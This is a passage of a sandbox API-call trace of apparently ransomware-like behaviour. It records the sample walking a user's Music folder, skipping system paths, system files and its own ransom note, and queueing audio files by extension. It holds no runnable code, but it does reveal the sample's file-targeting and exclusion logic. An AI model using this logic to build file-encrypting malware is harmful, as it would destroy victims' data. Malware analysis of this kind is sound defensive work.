(lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="ransomware") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="C:\\WINDOWS") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="C:\\Program Files (x86)") returned 0x0 [0074.844] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="C:\\Program Files") returned 0x0 [0074.844] GetProcessHeap () returned 0xe30000 [0074.844] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c4) returned 0xed31f0 [0074.844] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0074.845] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\*", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\*") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\*" [0074.845] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e8fd740, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0x897ba060, ftLastAccessTime.dwHighDateTime=0x1d5f078, ftLastWriteTime.dwLowDateTime=0x897ba060, ftLastWriteTime.dwHighDateTime=0x1d5f078, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec21b0 [0074.845] StrCmpW (psz1=".", psz2=".") returned 0 [0074.845] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e8fd740, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0x897ba060, ftLastAccessTime.dwHighDateTime=0x1d5f078, ftLastWriteTime.dwLowDateTime=0x897ba060, ftLastWriteTime.dwHighDateTime=0x1d5f078, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.845] StrCmpW (psz1="..", psz2=".") returned 1 [0074.845] StrCmpW (psz1="..", psz2="..") returned 0 [0074.845] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53f37ef0, ftCreationTime.dwHighDateTime=0x1d5e7f8, ftLastAccessTime.dwLowDateTime=0xc2a3c2b0, ftLastAccessTime.dwHighDateTime=0x1d5eb54, ftLastWriteTime.dwLowDateTime=0xc2a3c2b0, ftLastWriteTime.dwHighDateTime=0x1d5eb54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName="OAdJkPb-", cAlternateFileName="")) returned 1 [0074.845] StrCmpW (psz1="OAdJkPb-", psz2=".") returned 1 [0074.845] StrCmpW (psz1="OAdJkPb-", psz2="..") returned 1 [0074.845] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0074.845] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0074.845] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="OAdJkPb-", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0074.845] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\system32\\") returned 0x0 [0074.845] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\syswow64\\") returned 0x0 [0074.845] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\system\\") returned 0x0 [0074.845] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\winsxs\\") returned 0x0 [0074.845] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\appdata\\roaming\\") returned 0x0 [0074.845] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\appdata\\local\\") returned 0x0 [0074.845] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\appdata\\locallow\\") returned 0x0 [0074.845] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\all users\\microsoft\\") returned 0x0 [0074.845] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\inetpub\\logs\\") returned 0x0 [0074.845] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\boot\\") returned 0x0 [0074.845] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\perflogs\\") returned 0x0 [0074.845] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\programdata\\") returned 0x0 [0074.845] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\drivers\\") returned 0x0 [0074.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\wsus\\") returned 0x0 [0074.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\efstmpwp\\") returned 0x0 [0074.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\$recycle.bin\\") returned 0x0 [0074.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="crypt_detect") returned 0x0 [0074.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="cryptolocker") returned 0x0 [0074.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="ransomware") returned 0x0 [0074.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="C:\\WINDOWS") returned 0x0 [0074.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="C:\\Program Files (x86)") returned 0x0 [0074.846] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="C:\\Program Files") returned 0x0 [0074.846] GetProcessHeap () returned 0xe30000 [0074.846] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d6) returned 0xed46c8 [0074.846] StrCpyNW (in: psz1=0xed46c8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0074.846] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\*", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\*") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\*" [0074.846] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\*", lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53f37ef0, ftCreationTime.dwHighDateTime=0x1d5e7f8, ftLastAccessTime.dwLowDateTime=0xc2a3c2b0, ftLastAccessTime.dwHighDateTime=0x1d5eb54, ftLastWriteTime.dwLowDateTime=0xc2a3c2b0, ftLastWriteTime.dwHighDateTime=0x1d5eb54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2770 [0074.846] StrCmpW (psz1=".", psz2=".") returned 0 [0074.846] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53f37ef0, ftCreationTime.dwHighDateTime=0x1d5e7f8, ftLastAccessTime.dwLowDateTime=0xc2a3c2b0, ftLastAccessTime.dwHighDateTime=0x1d5eb54, ftLastWriteTime.dwLowDateTime=0xc2a3c2b0, ftLastWriteTime.dwHighDateTime=0x1d5eb54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.846] StrCmpW (psz1="..", psz2=".") returned 1 [0074.846] StrCmpW (psz1="..", psz2="..") returned 0 [0074.846] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee4d8020, ftCreationTime.dwHighDateTime=0x1d5e764, ftLastAccessTime.dwLowDateTime=0xe32ee490, ftLastAccessTime.dwHighDateTime=0x1d5eb06, ftLastWriteTime.dwLowDateTime=0xe32ee490, ftLastWriteTime.dwHighDateTime=0x1d5eb06, nFileSizeHigh=0x0, nFileSizeLow=0x293c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="KXtDlQHWMbiCZ2hHs6x.m4a", cAlternateFileName="KXTDLQ~1.M4A")) returned 1 [0074.846] StrCmpW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2=".") returned 1 [0074.846] StrCmpW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2="..") returned 1 [0074.846] StrCpyNW (in: psz1=0xed46c8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0074.846] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0074.846] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="KXtDlQHWMbiCZ2hHs6x.m4a", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a" [0074.846] PathFindExtensionW (pszPath="KXtDlQHWMbiCZ2hHs6x.m4a") returned=".m4a" [0074.846] StrCmpW (psz1=".m4a", psz2=".txd0t") returned -1 [0074.846] StrCmpIW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2="bootsect.bak") returned 1 [0074.847] StrCmpIW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2="iconcache.db") returned 1 [0074.847] StrCmpIW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2="thumbs.db") returned -1 [0074.847] StrCmpIW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2=" ransomware ") returned 1 [0074.847] StrCmpIW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2=" ransom ") returned 1 [0074.847] StrCmpIW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2="debug.txt") returned 1 [0074.847] StrCmpIW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2="boot.ini") returned 1 [0074.847] StrCmpIW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2="desktop.ini") returned 1 [0074.847] StrCmpIW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2="autorun.inf") returned 1 [0074.847] StrCmpIW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2="ntuser.dat") returned -1 [0074.847] StrCmpIW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2="ntldr") returned -1 [0074.847] StrCmpIW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2="ntdetect.com") returned -1 [0074.847] StrCmpIW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2="bootfont.bin") returned 1 [0074.847] StrCmpIW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.847] PathFindExtensionW (pszPath="KXtDlQHWMbiCZ2hHs6x.m4a") returned=".m4a" [0074.847] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".m4a") returned 0x0 [0074.847] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.847] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.847] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.862] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.862] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a" [0074.862] SetEvent (hEvent=0x3fc) returned 1 [0074.862] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61010020, ftCreationTime.dwHighDateTime=0x1d5e6f1, ftLastAccessTime.dwLowDateTime=0x203b5a50, ftLastAccessTime.dwHighDateTime=0x1d5ef15, ftLastWriteTime.dwLowDateTime=0x203b5a50, ftLastWriteTime.dwHighDateTime=0x1d5ef15, nFileSizeHigh=0x0, nFileSizeLow=0x7dd1, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="pEnlGp0QjdthKZA-Yo5o.mp3", cAlternateFileName="PENLGP~1.MP3")) returned 1 [0074.862] StrCmpW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2=".") returned 1 [0074.862] StrCmpW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2="..") returned 1 [0074.862] StrCpyNW (in: psz1=0xed46c8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0074.862] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0074.862] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="pEnlGp0QjdthKZA-Yo5o.mp3", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3" [0074.862] PathFindExtensionW (pszPath="pEnlGp0QjdthKZA-Yo5o.mp3") returned=".mp3" [0074.862] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0074.862] StrCmpIW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2="bootsect.bak") returned 1 [0074.862] StrCmpIW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2="iconcache.db") returned 1 [0074.862] StrCmpIW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2="thumbs.db") returned -1 [0074.862] StrCmpIW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2=" ransomware ") returned 1 [0074.862] StrCmpIW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2=" ransom ") returned 1 [0074.862] StrCmpIW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2="debug.txt") returned 1 [0074.862] StrCmpIW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2="boot.ini") returned 1 [0074.862] StrCmpIW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2="desktop.ini") returned 1 [0074.862] StrCmpIW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2="autorun.inf") returned 1 [0074.862] StrCmpIW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2="ntuser.dat") returned 1 [0074.862] StrCmpIW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2="ntldr") returned 1 [0074.862] StrCmpIW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2="ntdetect.com") returned 1 [0074.862] StrCmpIW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2="bootfont.bin") returned 1 [0074.862] StrCmpIW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.862] PathFindExtensionW (pszPath="pEnlGp0QjdthKZA-Yo5o.mp3") returned=".mp3" [0074.862] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0074.863] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.863] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.863] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.882] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.882] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3" [0074.883] SetEvent (hEvent=0x3fc) returned 1 [0074.883] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2e37b0, ftCreationTime.dwHighDateTime=0x1d5ec02, ftLastAccessTime.dwLowDateTime=0xacd5dae0, ftLastAccessTime.dwHighDateTime=0x1d5e3c0, ftLastWriteTime.dwLowDateTime=0xacd5dae0, ftLastWriteTime.dwHighDateTime=0x1d5e3c0, nFileSizeHigh=0x0, nFileSizeLow=0x2ab0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="ZwNcr2UV.mp3", cAlternateFileName="")) returned 1 [0074.883] StrCmpW (psz1="ZwNcr2UV.mp3", psz2=".") returned 1 [0074.883] StrCmpW (psz1="ZwNcr2UV.mp3", psz2="..") returned 1 [0074.883] StrCpyNW (in: psz1=0xed46c8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0074.883] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0074.883] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="ZwNcr2UV.mp3", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3" [0074.883] PathFindExtensionW (pszPath="ZwNcr2UV.mp3") returned=".mp3" [0074.883] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0074.883] StrCmpIW (psz1="ZwNcr2UV.mp3", psz2="bootsect.bak") returned 1 [0074.883] StrCmpIW (psz1="ZwNcr2UV.mp3", psz2="iconcache.db") returned 1 [0074.883] StrCmpIW (psz1="ZwNcr2UV.mp3", psz2="thumbs.db") returned 1 [0074.883] StrCmpIW (psz1="ZwNcr2UV.mp3", psz2=" ransomware ") returned 1 [0074.883] StrCmpIW (psz1="ZwNcr2UV.mp3", psz2=" ransom ") returned 1 [0074.883] StrCmpIW (psz1="ZwNcr2UV.mp3", psz2="debug.txt") returned 1 [0074.883] StrCmpIW (psz1="ZwNcr2UV.mp3", psz2="boot.ini") returned 1 [0074.883] StrCmpIW (psz1="ZwNcr2UV.mp3", psz2="desktop.ini") returned 1 [0074.883] StrCmpIW (psz1="ZwNcr2UV.mp3", psz2="autorun.inf") returned 1 [0074.883] StrCmpIW (psz1="ZwNcr2UV.mp3", psz2="ntuser.dat") returned 1 [0074.883] StrCmpIW (psz1="ZwNcr2UV.mp3", psz2="ntldr") returned 1 [0074.883] StrCmpIW (psz1="ZwNcr2UV.mp3", psz2="ntdetect.com") returned 1 [0074.883] StrCmpIW (psz1="ZwNcr2UV.mp3", psz2="bootfont.bin") returned 1 [0074.883] StrCmpIW (psz1="ZwNcr2UV.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.883] PathFindExtensionW (pszPath="ZwNcr2UV.mp3") returned=".mp3" [0074.883] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0074.883] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.883] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.883] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.890] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.890] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3" [0074.890] SetEvent (hEvent=0x3fc) returned 1 [0074.890] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2e37b0, ftCreationTime.dwHighDateTime=0x1d5ec02, ftLastAccessTime.dwLowDateTime=0xacd5dae0, ftLastAccessTime.dwHighDateTime=0x1d5e3c0, ftLastWriteTime.dwLowDateTime=0xacd5dae0, ftLastWriteTime.dwHighDateTime=0x1d5e3c0, nFileSizeHigh=0x0, nFileSizeLow=0x2ab0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="ZwNcr2UV.mp3", cAlternateFileName="")) returned 0 [0074.890] FindClose (in: hFindFile=0xec2770 | out: hFindFile=0xec2770) returned 1 [0074.890] GetProcessHeap () returned 0xe30000 [0074.890] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed46c8 | out: hHeap=0xe30000) returned 1 [0074.890] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1082d280, ftCreationTime.dwHighDateTime=0x1d5e2d8, ftLastAccessTime.dwLowDateTime=0xc5bdf750, ftLastAccessTime.dwHighDateTime=0x1d5e2ca, ftLastWriteTime.dwLowDateTime=0xc5bdf750, ftLastWriteTime.dwHighDateTime=0x1d5e2ca, nFileSizeHigh=0x0, nFileSizeLow=0x1069c, dwReserved0=0x741, dwReserved1=0x0, cFileName="Ph7y_8.m4a", cAlternateFileName="")) returned 1 [0074.890] StrCmpW (psz1="Ph7y_8.m4a", psz2=".") returned 1 [0074.890] StrCmpW (psz1="Ph7y_8.m4a", psz2="..") returned 1 [0074.890] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0074.890] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0074.890] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="Ph7y_8.m4a", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a" [0074.891] PathFindExtensionW (pszPath="Ph7y_8.m4a") returned=".m4a" [0074.891] StrCmpW (psz1=".m4a", psz2=".txd0t") returned -1 [0074.891] StrCmpIW (psz1="Ph7y_8.m4a", psz2="bootsect.bak") returned 1 [0074.891] StrCmpIW (psz1="Ph7y_8.m4a", psz2="iconcache.db") returned 1 [0074.891] StrCmpIW (psz1="Ph7y_8.m4a", psz2="thumbs.db") returned -1 [0074.891] 